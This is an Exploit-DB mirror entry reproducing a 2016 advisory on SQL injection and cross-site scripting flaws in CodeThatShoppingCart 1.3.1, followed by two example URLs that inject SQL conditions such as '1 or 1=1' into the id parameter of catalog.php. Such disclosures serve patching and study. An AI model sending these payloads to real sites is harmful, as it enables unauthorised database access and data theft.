exploit-db-mirror/platforms/php/webapps/25638.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

11 lines
No EOL
605 B
Text
Executable file

source: http://www.securityfocus.com/bid/13560/info
CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data.
CodeThatShoppingCart 1.3.1 was reported to be vulnerable. Other versions may be affected as well.
http://www.example.com/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60
http://www.example.com/shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1